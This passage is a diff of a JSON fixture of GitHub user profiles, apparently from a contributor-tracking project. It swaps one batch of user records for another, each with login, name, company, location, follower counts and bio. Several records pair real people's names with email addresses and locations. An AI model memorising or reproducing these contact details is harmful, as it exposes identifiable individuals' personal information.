"MDQ6VXNlcjE5ODg1MTE2", - "bio": "I born as a programmer, I started write code on C64 when I was 11 years old. Now I have 18 year experience in software industry ", - "is_hireable": true, + "following_count": 0, + "followers_count": 9, + "public_gists_count": 0, + "public_repositories_count": 39, + "created_at": "2010-01-01T14:24:51Z", + "updated_at": "2024-09-20T16:41:03Z", + "node_id": "MDQ6VXNlcjE3NDk3OA==", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2037, + "pk": 7348, "fields": { - "nest_created_at": "2024-09-12T00:33:50.186Z", - "nest_updated_at": "2024-09-12T00:33:50.186Z", - "name": "HumanG33k", - "login": "HumanG33k", + "nest_created_at": "2024-09-22T08:43:57.634Z", + "nest_updated_at": "2024-09-22T19:28:40.869Z", + "name": "Philippe Cadé", + "login": "philippecade", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1794193?v=4", - "company": "Wild Turtles", - "location": "France Poitiers", + "avatar_url": "https://avatars.githubusercontent.com/u/804768?v=4", + "company": "@SwissAS ", + "location": "", "collaborators_count": 0, - "following_count": 533, - "followers_count": 38, - "public_gists_count": 12, - "public_repositories_count": 119, - "created_at": "2012-05-30T15:39:49Z", - "updated_at": "2024-08-26T18:23:04Z", - "node_id": "MDQ6VXNlcjE3OTQxOTM=", - "bio": "Most of our dev are done on our forgejo.", + "following_count": 1, + "followers_count": 9, + "public_gists_count": 6, + "public_repositories_count": 16, + "created_at": "2011-05-23T09:05:11Z", + "updated_at": "2024-02-29T14:57:48Z", + "node_id": "MDQ6VXNlcjgwNDc2OA==", + "bio": "", "is_hireable": false, - "twitter_username": "Wild_Turtles" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2038, + "pk": 7349, "fields": { - "nest_created_at": "2024-09-12T00:33:57.109Z", - "nest_updated_at": "2024-09-12T00:33:57.109Z", - "name": "Merl J Creps", - "login": "mcrepssdi", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/87571937?v=4", - "company": "Steel Dynamics ", - "location": "Delta Ohio", + "nest_created_at": "2024-09-22T08:43:57.950Z", + "nest_updated_at": "2024-09-22T19:28:41.191Z", + "name": "Pierre Hallot", + "login": "phallot", + "email": "pierre.hallot@nexthink.com", + "avatar_url": "https://avatars.githubusercontent.com/u/126784740?v=4", + "company": "@nexthink ", + "location": "", "collaborators_count": 0, - "following_count": 7, - "followers_count": 5, + "following_count": 3, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2021-07-17T13:06:11Z", - "updated_at": "2024-09-11T08:42:07Z", - "node_id": "MDQ6VXNlcjg3NTcxOTM3", - "bio": "Senior Software Engineer", - "is_hireable": true, + "public_repositories_count": 5, + "created_at": "2023-03-02T12:49:03Z", + "updated_at": "2024-09-19T08:19:13Z", + "node_id": "U_kgDOB46U5A", + "bio": "", + "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2039, + "pk": 7350, "fields": { - "nest_created_at": "2024-09-12T00:34:01.184Z", - "nest_updated_at": "2024-09-12T00:34:01.184Z", - "name": "", - "login": "mgonzcast", + "nest_created_at": "2024-09-22T08:43:58.277Z", + "nest_updated_at": "2024-09-22T19:28:41.500Z", + "name": "RK", + "login": "rperam", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/63349279?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/1504240?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 1, - "public_gists_count": 3, - "public_repositories_count": 3, - "created_at": "2020-04-08T11:32:53Z", - "updated_at": "2024-08-29T19:22:42Z", - "node_id": "MDQ6VXNlcjYzMzQ5Mjc5", + "public_gists_count": 0, + "public_repositories_count": 11, + "created_at": "2012-03-05T19:45:40Z", + "updated_at": "2023-10-11T21:44:18Z", + "node_id": "MDQ6VXNlcjE1MDQyNDA=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411228,24 +669677,24 @@ }, { "model": "github.user", - "pk": 2040, + "pk": 7351, "fields": { - "nest_created_at": "2024-09-12T00:34:02.386Z", - "nest_updated_at": "2024-09-12T00:34:02.386Z", - "name": "Martin", - "login": "amfleurke", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3415426?v=4", - "company": "Portavita", - "location": "Amsterdam", + "nest_created_at": "2024-09-22T08:43:58.609Z", + "nest_updated_at": "2024-09-22T19:37:37.249Z", + "name": "Rafael Jimenez", + "login": "rjimgal", + "email": "rafaeljimenezgalan@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/6002347?v=4", + "company": "", + "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 2, "public_gists_count": 0, - "public_repositories_count": 6, - "created_at": "2013-01-29T09:43:43Z", - "updated_at": "2024-02-14T13:57:05Z", - "node_id": "MDQ6VXNlcjM0MTU0MjY=", + "public_repositories_count": 17, + "created_at": "2013-11-21T15:29:55Z", + "updated_at": "2024-05-11T17:53:48Z", + "node_id": "MDQ6VXNlcjYwMDIzNDc=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411253,24 +669702,24 @@ }, { "model": "github.user", - "pk": 2041, + "pk": 7352, "fields": { - "nest_created_at": "2024-09-12T00:34:03.641Z", - "nest_updated_at": "2024-09-12T00:34:45.382Z", - "name": "", - "login": "Muskan-0618", + "nest_created_at": "2024-09-22T08:43:59.019Z", + "nest_updated_at": "2024-09-22T19:28:42.125Z", + "name": "Rafał Gała", + "login": "rgala", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/111416488?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/19968746?v=4", "company": "", - "location": "", + "location": "Poland", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2022-08-17T06:48:58Z", - "updated_at": "2024-06-04T08:53:30Z", - "node_id": "U_kgDOBqQUqA", + "public_repositories_count": 12, + "created_at": "2016-06-16T06:48:58Z", + "updated_at": "2024-08-29T19:20:08Z", + "node_id": "MDQ6VXNlcjE5OTY4NzQ2", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411278,74 +669727,74 @@ }, { "model": "github.user", - "pk": 2042, + "pk": 7353, "fields": { - "nest_created_at": "2024-09-12T00:34:05.271Z", - "nest_updated_at": "2024-09-12T00:34:05.271Z", - "name": "Elias Müller", - "login": "eliasmueller", + "nest_created_at": "2024-09-22T08:43:59.330Z", + "nest_updated_at": "2024-09-22T19:28:42.439Z", + "name": "", + "login": "igibanez", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/63012534?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/62079874?v=4", "company": "", - "location": "Germany", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 7, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 2, - "created_at": "2020-04-01T17:30:07Z", - "updated_at": "2024-05-22T14:16:55Z", - "node_id": "MDQ6VXNlcjYzMDEyNTM0", - "bio": "Software Engineer ", + "public_repositories_count": 1, + "created_at": "2020-03-11T21:56:34Z", + "updated_at": "2020-03-12T17:21:25Z", + "node_id": "MDQ6VXNlcjYyMDc5ODc0", + "bio": "", "is_hireable": false, - "twitter_username": "eliasbndkt" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2043, + "pk": 7354, "fields": { - "nest_created_at": "2024-09-12T00:34:06.876Z", - "nest_updated_at": "2024-09-12T00:34:19.147Z", - "name": "Samet Yilmaz", - "login": "sametr35", + "nest_created_at": "2024-09-22T08:43:59.651Z", + "nest_updated_at": "2024-09-22T19:28:42.757Z", + "name": "ishiDACo", + "login": "ishiDACo", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/98058266?v=4", - "company": "PurpleBox Inc.", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/2542762?v=4", + "company": "freelance engineer", + "location": "Chiba, Japan", "collaborators_count": 0, "following_count": 2, - "followers_count": 13, - "public_gists_count": 0, - "public_repositories_count": 8, - "created_at": "2022-01-19T21:02:17Z", - "updated_at": "2024-08-09T17:01:05Z", - "node_id": "U_kgDOBdhAGg", - "bio": "Application Security Engineer", + "followers_count": 6, + "public_gists_count": 3, + "public_repositories_count": 16, + "created_at": "2012-10-12T06:51:57Z", + "updated_at": "2024-01-31T07:29:35Z", + "node_id": "MDQ6VXNlcjI1NDI3NjI=", + "bio": "Java8, ESP8266(Arduino), Unity, AWS, infrastructure", "is_hireable": false, - "twitter_username": "" + "twitter_username": "ishiDACo" } }, { "model": "github.user", - "pk": 2044, + "pk": 7355, "fields": { - "nest_created_at": "2024-09-12T00:34:08.124Z", - "nest_updated_at": "2024-09-12T00:34:08.124Z", - "name": "SuperPat", - "login": "SuperPat45", + "nest_created_at": "2024-09-22T08:43:59.961Z", + "nest_updated_at": "2024-09-22T19:28:43.068Z", + "name": "", + "login": "jansohn", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/7791600?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/7804514?v=4", "company": "", - "location": "France", + "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 3, - "public_gists_count": 0, - "public_repositories_count": 1, - "created_at": "2014-06-04T08:59:42Z", - "updated_at": "2024-07-22T09:06:02Z", - "node_id": "MDQ6VXNlcjc3OTE2MDA=", + "followers_count": 1, + "public_gists_count": 1, + "public_repositories_count": 25, + "created_at": "2014-06-05T11:14:56Z", + "updated_at": "2024-09-15T16:56:39Z", + "node_id": "MDQ6VXNlcjc4MDQ1MTQ=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411353,24 +669802,24 @@ }, { "model": "github.user", - "pk": 2045, + "pk": 7356, "fields": { - "nest_created_at": "2024-09-12T00:34:09.336Z", - "nest_updated_at": "2024-09-12T00:34:09.336Z", + "nest_created_at": "2024-09-22T08:44:00.295Z", + "nest_updated_at": "2024-09-22T19:28:43.377Z", "name": "", - "login": "cda2024", + "login": "jsch-adt", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/161817375?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/127794637?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-03-01T08:31:35Z", - "updated_at": "2024-08-13T12:57:53Z", - "node_id": "U_kgDOCaUjHw", + "public_repositories_count": 6, + "created_at": "2023-03-13T20:51:47Z", + "updated_at": "2024-04-09T16:25:54Z", + "node_id": "U_kgDOB539zQ", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411378,24 +669827,24 @@ }, { "model": "github.user", - "pk": 2046, + "pk": 7357, "fields": { - "nest_created_at": "2024-09-12T00:34:11.787Z", - "nest_updated_at": "2024-09-12T00:34:22.097Z", + "nest_created_at": "2024-09-22T08:44:00.610Z", + "nest_updated_at": "2024-09-22T19:28:43.689Z", "name": "", - "login": "Mridula03g", + "login": "markitovtr1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/85608136?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/2931989?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2021-06-09T07:08:59Z", - "updated_at": "2024-06-26T07:40:08Z", - "node_id": "MDQ6VXNlcjg1NjA4MTM2", + "following_count": 1, + "followers_count": 3, + "public_gists_count": 1, + "public_repositories_count": 13, + "created_at": "2012-11-30T15:36:16Z", + "updated_at": "2024-09-04T00:32:31Z", + "node_id": "MDQ6VXNlcjI5MzE5ODk=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411403,24 +669852,24 @@ }, { "model": "github.user", - "pk": 2047, + "pk": 7358, "fields": { - "nest_created_at": "2024-09-12T00:34:13.087Z", - "nest_updated_at": "2024-09-12T00:34:13.087Z", + "nest_created_at": "2024-09-22T08:44:00.960Z", + "nest_updated_at": "2024-09-22T19:28:43.998Z", "name": "", - "login": "AnthonyPomtree", + "login": "mims-github", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/162185359?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/82363077?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2024-03-04T18:39:37Z", - "updated_at": "2024-03-04T18:39:37Z", - "node_id": "U_kgDOCarAjw", + "public_repositories_count": 12, + "created_at": "2021-04-12T06:22:50Z", + "updated_at": "2024-07-24T12:52:23Z", + "node_id": "MDQ6VXNlcjgyMzYzMDc3", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411428,49 +669877,74 @@ }, { "model": "github.user", - "pk": 2048, + "pk": 7359, "fields": { - "nest_created_at": "2024-09-12T00:34:14.331Z", - "nest_updated_at": "2024-09-12T00:34:14.331Z", - "name": "Sravana", - "login": "Sravana-Synthesis", + "nest_created_at": "2024-09-22T08:44:01.588Z", + "nest_updated_at": "2024-09-22T19:28:44.624Z", + "name": "", + "login": "mo7ty", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/70380588?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/10546739?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2020-08-28T13:19:32Z", - "updated_at": "2024-07-15T10:17:20Z", - "node_id": "MDQ6VXNlcjcwMzgwNTg4", - "bio": "", + "public_repositories_count": 7, + "created_at": "2015-01-15T12:38:09Z", + "updated_at": "2024-04-06T19:23:07Z", + "node_id": "MDQ6VXNlcjEwNTQ2NzM5", + "bio": "Passionate for coding!\r\nAddicted to use of object-oriented programming languages in modular architectures for distributed systems!\r\n\r\nm(ö.ö)mo7ty55", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2049, + "pk": 7360, "fields": { - "nest_created_at": "2024-09-12T00:34:15.560Z", - "nest_updated_at": "2024-09-12T00:34:16.774Z", - "name": "", - "login": "zhchangqing", + "nest_created_at": "2024-09-22T08:44:02.248Z", + "nest_updated_at": "2024-09-22T19:28:45.245Z", + "name": "Naveen", + "login": "naveensrinivasan", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/24227825?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/172697?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, - "public_gists_count": 0, - "public_repositories_count": 0, - "created_at": "2016-11-28T14:50:20Z", - "updated_at": "2024-03-13T06:43:06Z", - "node_id": "MDQ6VXNlcjI0MjI3ODI1", + "followers_count": 140, + "public_gists_count": 136, + "public_repositories_count": 327, + "created_at": "2009-12-27T20:45:38Z", + "updated_at": "2024-09-13T17:15:09Z", + "node_id": "MDQ6VXNlcjE3MjY5Nw==", + "bio": "Contributes to fun OSS projects like https://github.com/ossf and is a Google Open Source Peer Bonus award winner for 2021,2022 and 2024. ", + "is_hireable": false, + "twitter_username": "" + } +}, +{ + "model": "github.user", + "pk": 7361, + "fields": { + "nest_created_at": "2024-09-22T08:44:02.572Z", + "nest_updated_at": "2024-09-22T19:28:45.568Z", + "name": "nicolastrres", + "login": "nicolastrres", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/6579348?v=4", + "company": "", + "location": "", + "collaborators_count": 0, + "following_count": 69, + "followers_count": 45, + "public_gists_count": 4, + "public_repositories_count": 60, + "created_at": "2014-02-03T22:14:10Z", + "updated_at": "2024-08-29T01:37:39Z", + "node_id": "MDQ6VXNlcjY1NzkzNDg=", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411478,24 +669952,24 @@ }, { "model": "github.user", - "pk": 2050, + "pk": 7362, "fields": { - "nest_created_at": "2024-09-12T00:34:20.407Z", - "nest_updated_at": "2024-09-12T00:34:20.407Z", + "nest_created_at": "2024-09-22T08:44:02.925Z", + "nest_updated_at": "2024-09-22T19:28:45.894Z", "name": "", - "login": "yyuanxin", + "login": "nikita-efremov1", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/50551313?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/104001148?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 3, - "followers_count": 3, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 11, - "created_at": "2019-05-12T15:40:36Z", - "updated_at": "2024-07-10T02:24:03Z", - "node_id": "MDQ6VXNlcjUwNTUxMzEz", + "public_repositories_count": 4, + "created_at": "2022-04-19T10:44:47Z", + "updated_at": "2024-02-28T14:22:01Z", + "node_id": "U_kgDOBjLufA", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411503,74 +669977,74 @@ }, { "model": "github.user", - "pk": 2051, + "pk": 7363, "fields": { - "nest_created_at": "2024-09-12T00:34:23.309Z", - "nest_updated_at": "2024-09-12T00:34:23.309Z", - "name": "Eli Fabens", - "login": "efabens", + "nest_created_at": "2024-09-22T08:44:03.261Z", + "nest_updated_at": "2024-09-22T19:28:46.226Z", + "name": "Christian Lange", + "login": "outbreaker", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/3656306?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/6695566?v=4", "company": "", - "location": "Portland, OR", + "location": "Germany", "collaborators_count": 0, - "following_count": 3, - "followers_count": 5, + "following_count": 6, + "followers_count": 3, "public_gists_count": 0, - "public_repositories_count": 31, - "created_at": "2013-02-21T06:15:34Z", - "updated_at": "2024-09-03T11:25:42Z", - "node_id": "MDQ6VXNlcjM2NTYzMDY=", + "public_repositories_count": 8, + "created_at": "2014-02-16T10:14:14Z", + "updated_at": "2024-09-09T18:28:32Z", + "node_id": "MDQ6VXNlcjY2OTU1NjY=", "bio": "", "is_hireable": false, - "twitter_username": "" + "twitter_username": "outbreaker1303" } }, { "model": "github.user", - "pk": 2052, + "pk": 7364, "fields": { - "nest_created_at": "2024-09-12T00:34:24.531Z", - "nest_updated_at": "2024-09-12T00:34:24.531Z", - "name": "", - "login": "jchandler-parsons", + "nest_created_at": "2024-09-22T08:44:03.584Z", + "nest_updated_at": "2024-09-22T19:28:46.541Z", + "name": "Jason Sievert", + "login": "putz612", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/57921749?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/952758?v=4", "company": "", "location": "", "collaborators_count": 0, - "following_count": 0, - "followers_count": 0, - "public_gists_count": 1, - "public_repositories_count": 0, - "created_at": "2019-11-18T21:49:38Z", - "updated_at": "2024-03-21T03:13:04Z", - "node_id": "MDQ6VXNlcjU3OTIxNzQ5", + "following_count": 9, + "followers_count": 8, + "public_gists_count": 7, + "public_repositories_count": 24, + "created_at": "2011-08-01T22:16:34Z", + "updated_at": "2024-09-14T17:51:49Z", + "node_id": "MDQ6VXNlcjk1Mjc1OA==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2053, + "pk": 7365, "fields": { - "nest_created_at": "2024-09-12T00:34:25.783Z", - "nest_updated_at": "2024-09-12T00:34:25.783Z", + "nest_created_at": "2024-09-22T08:44:03.905Z", + "nest_updated_at": "2024-09-22T19:28:46.866Z", "name": "", - "login": "Guntur123", + "login": "spielerf", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/34702793?v=4", - "company": "", - "location": "", + "avatar_url": "https://avatars.githubusercontent.com/u/89512635?v=4", + "company": "VisualVest GmbH", + "location": "Frankfurt", "collaborators_count": 0, "following_count": 0, "followers_count": 0, "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-12-20T05:44:53Z", - "updated_at": "2024-07-23T03:03:17Z", - "node_id": "MDQ6VXNlcjM0NzAyNzkz", + "public_repositories_count": 1, + "created_at": "2021-08-25T08:06:57Z", + "updated_at": "2024-07-24T08:42:13Z", + "node_id": "MDQ6VXNlcjg5NTEyNjM1", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411578,14 +670052,14 @@ }, { "model": "github.user", - "pk": 2054, + "pk": 7366, "fields": { - "nest_created_at": "2024-09-12T00:34:28.207Z", - "nest_updated_at": "2024-09-12T00:34:28.207Z", + "nest_created_at": "2024-09-22T08:44:04.239Z", + "nest_updated_at": "2024-09-22T19:28:47.185Z", "name": "", - "login": "levchv", - "email": "levchv@gmail.com", - "avatar_url": "https://avatars.githubusercontent.com/u/5598234?v=4", + "login": "stefan-prange", + "email": "", + "avatar_url": "https://avatars.githubusercontent.com/u/51698579?v=4", "company": "", "location": "", "collaborators_count": 0, @@ -411593,9 +670067,9 @@ "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 2, - "created_at": "2013-10-02T20:17:54Z", - "updated_at": "2024-06-14T12:06:12Z", - "node_id": "MDQ6VXNlcjU1OTgyMzQ=", + "created_at": "2019-06-11T08:39:24Z", + "updated_at": "2024-08-20T12:12:16Z", + "node_id": "MDQ6VXNlcjUxNjk4NTc5", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411603,74 +670077,74 @@ }, { "model": "github.user", - "pk": 2055, + "pk": 7367, "fields": { - "nest_created_at": "2024-09-12T00:34:29.433Z", - "nest_updated_at": "2024-09-12T00:34:29.433Z", - "name": "Chad Wilson", - "login": "chadlwilson", + "nest_created_at": "2024-09-22T08:44:04.549Z", + "nest_updated_at": "2024-09-22T19:28:47.499Z", + "name": "", + "login": "stephenbarry-transunion", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/29788154?v=4", - "company": "@thoughtworks", - "location": "Singapore", + "avatar_url": "https://avatars.githubusercontent.com/u/50362641?v=4", + "company": "", + "location": "", "collaborators_count": 0, - "following_count": 110, - "followers_count": 92, - "public_gists_count": 6, - "public_repositories_count": 50, - "created_at": "2017-06-30T01:47:24Z", - "updated_at": "2024-08-13T04:30:05Z", - "node_id": "MDQ6VXNlcjI5Nzg4MTU0", - "bio": "Technical principal at Thoughtworks - helping clients deliver distributed architectures. 🥝 in 🇸🇬. All views shared are my own.", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 1, + "created_at": "2019-05-07T10:06:06Z", + "updated_at": "2021-08-16T15:10:31Z", + "node_id": "MDQ6VXNlcjUwMzYyNjQx", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2056, + "pk": 7368, "fields": { - "nest_created_at": "2024-09-12T00:34:32.292Z", - "nest_updated_at": "2024-09-12T00:34:32.292Z", - "name": "Steven Huypens", - "login": "ponziani", + "nest_created_at": "2024-09-22T08:44:05.196Z", + "nest_updated_at": "2024-09-22T19:28:48.127Z", + "name": "", + "login": "techie2000", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/12340042?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/38585780?v=4", "company": "", - "location": "Belgium", + "location": "Probably somewhere quiet", "collaborators_count": 0, - "following_count": 0, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 15, - "created_at": "2015-05-08T13:09:06Z", - "updated_at": "2024-01-02T15:40:34Z", - "node_id": "MDQ6VXNlcjEyMzQwMDQy", - "bio": "Software engineer with a passion for creating clean, efficient code and building innovative solutions.", + "following_count": 26, + "followers_count": 14, + "public_gists_count": 19, + "public_repositories_count": 69, + "created_at": "2018-04-21T12:35:18Z", + "updated_at": "2024-09-20T15:06:33Z", + "node_id": "MDQ6VXNlcjM4NTg1Nzgw", + "bio": "", "is_hireable": false, - "twitter_username": "Sjarel" + "twitter_username": "" } }, { "model": "github.user", - "pk": 2057, + "pk": 7369, "fields": { - "nest_created_at": "2024-09-12T00:34:33.529Z", - "nest_updated_at": "2024-09-12T00:34:33.529Z", - "name": "", - "login": "shadowjjackson", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/153722872?v=4", + "nest_created_at": "2024-09-22T08:44:05.833Z", + "nest_updated_at": "2024-09-22T19:28:48.780Z", + "name": "Vlad Tatavu", + "login": "vladt", + "email": "vladt@sonatype.com", + "avatar_url": "https://avatars.githubusercontent.com/u/239673?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 0, - "followers_count": 0, + "followers_count": 3, "public_gists_count": 0, "public_repositories_count": 0, - "created_at": "2023-12-13T09:37:58Z", - "updated_at": "2024-03-25T13:35:01Z", - "node_id": "U_kgDOCSmf-A", + "created_at": "2010-04-08T16:36:51Z", + "updated_at": "2024-07-15T04:20:51Z", + "node_id": "MDQ6VXNlcjIzOTY3Mw==", "bio": "", "is_hireable": false, "twitter_username": "" @@ -411678,124 +670152,124 @@ }, { "model": "github.user", - "pk": 2058, + "pk": 7370, "fields": { - "nest_created_at": "2024-09-12T00:34:34.742Z", - "nest_updated_at": "2024-09-12T00:34:34.742Z", - "name": "Fugitif", - "login": "Teicu", + "nest_created_at": "2024-09-22T08:44:06.148Z", + "nest_updated_at": "2024-09-22T19:28:49.106Z", + "name": "木易什么来着", + "login": "mysmlz", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/1572822?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/38951157?v=4", "company": "", - "location": "", + "location": "中国,秦皇岛", "collaborators_count": 0, - "following_count": 171, - "followers_count": 25, - "public_gists_count": 3, - "public_repositories_count": 169, - "created_at": "2012-03-25T08:26:26Z", - "updated_at": "2023-06-19T05:32:03Z", - "node_id": "MDQ6VXNlcjE1NzI4MjI=", - "bio": "Security enthusiast, Penetration tester", + "following_count": 0, + "followers_count": 3, + "public_gists_count": 0, + "public_repositories_count": 8, + "created_at": "2018-05-03T13:39:27Z", + "updated_at": "2024-09-19T11:53:02Z", + "node_id": "MDQ6VXNlcjM4OTUxMTU3", + "bio": "哈哈哈哈哈哈嗝", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2059, + "pk": 7371, "fields": { - "nest_created_at": "2024-09-12T00:34:36.060Z", - "nest_updated_at": "2024-09-12T00:34:36.060Z", - "name": "Jyotsana Shankar", - "login": "JyotsanaShankar", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/34038698?v=4", - "company": "", - "location": "Bangalore", + "nest_created_at": "2024-09-22T08:44:06.463Z", + "nest_updated_at": "2024-09-22T19:28:49.442Z", + "name": "Swapnil Mahajan", + "login": "swapnilsm", + "email": "swapnilsm@gmail.com", + "avatar_url": "https://avatars.githubusercontent.com/u/912433?v=4", + "company": "Google", + "location": "Bengaluru, Karnataka, India", "collaborators_count": 0, - "following_count": 3, - "followers_count": 1, - "public_gists_count": 0, - "public_repositories_count": 3, - "created_at": "2017-11-27T18:09:03Z", - "updated_at": "2024-07-22T08:25:31Z", - "node_id": "MDQ6VXNlcjM0MDM4Njk4", + "following_count": 1, + "followers_count": 8, + "public_gists_count": 1, + "public_repositories_count": 35, + "created_at": "2011-07-13T10:10:26Z", + "updated_at": "2024-09-08T17:00:57Z", + "node_id": "MDQ6VXNlcjkxMjQzMw==", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2060, + "pk": 7372, "fields": { - "nest_created_at": "2024-09-12T00:34:37.265Z", - "nest_updated_at": "2024-09-12T00:34:37.265Z", - "name": "Maya S.", - "login": "amaridev", - "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/13658668?v=4", - "company": "", - "location": "Berlin", + "nest_created_at": "2024-09-22T08:44:06.775Z", + "nest_updated_at": "2024-09-22T19:28:49.753Z", + "name": "Sébastien Rius", + "login": "srius", + "email": "srius@free.fr", + "avatar_url": "https://avatars.githubusercontent.com/u/17590313?v=4", + "company": "Capgemini", + "location": "Rennes", "collaborators_count": 0, - "following_count": 5, - "followers_count": 3, - "public_gists_count": 1, - "public_repositories_count": 0, - "created_at": "2015-08-05T10:42:13Z", - "updated_at": "2024-07-17T11:54:01Z", - "node_id": "MDQ6VXNlcjEzNjU4NjY4", + "following_count": 0, + "followers_count": 0, + "public_gists_count": 0, + "public_repositories_count": 4, + "created_at": "2016-03-02T09:56:56Z", + "updated_at": "2022-10-27T12:43:52Z", + "node_id": "MDQ6VXNlcjE3NTkwMzEz", "bio": "", - "is_hireable": false, + "is_hireable": true, "twitter_username": "" } }, { "model": "github.user", - "pk": 2061, + "pk": 7373, "fields": { - "nest_created_at": "2024-09-12T00:34:40.087Z", - "nest_updated_at": "2024-09-12T00:34:40.087Z", - "name": "Aliyeva Khalida", - "login": "aliyevakhalida", + "nest_created_at": "2024-09-22T08:44:07.095Z", + "nest_updated_at": "2024-09-22T19:28:50.062Z", + "name": "Thomas", + "login": "Thomas-WB", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/105045412?v=4", - "company": "PASHA Bank OJSC", - "location": "Baku, Azerbaijan", + "avatar_url": "https://avatars.githubusercontent.com/u/20992189?v=4", + "company": "TwbLabs", + "location": "", "collaborators_count": 0, - "following_count": 16, - "followers_count": 9, + "following_count": 0, + "followers_count": 0, "public_gists_count": 0, "public_repositories_count": 1, - "created_at": "2022-05-06T08:40:11Z", - "updated_at": "2024-08-29T21:31:09Z", - "node_id": "U_kgDOBkLdpA", - "bio": "Software Engineer", + "created_at": "2016-08-12T14:02:12Z", + "updated_at": "2024-01-25T07:59:26Z", + "node_id": "MDQ6VXNlcjIwOTkyMTg5", + "bio": "", "is_hireable": false, "twitter_username": "" } }, { "model": "github.user", - "pk": 2062, + "pk": 7374, "fields": { - "nest_created_at": "2024-09-12T00:34:41.276Z", - "nest_updated_at": "2024-09-12T00:34:41.276Z", + "nest_created_at": "2024-09-22T08:44:07.431Z", + "nest_updated_at": "2024-09-22T19:28:50.372Z", "name": "", - "login": "vmatyus", + "login": "thorsten-meinl-knime", "email": "", - "avatar_url": "https://avatars.githubusercontent.com/u/26717393?v=4", + "avatar_url": "https://avatars.githubusercontent.com/u/124794086?v=4", "company": "", "location": "", "collaborators_count": 0, "following_count": 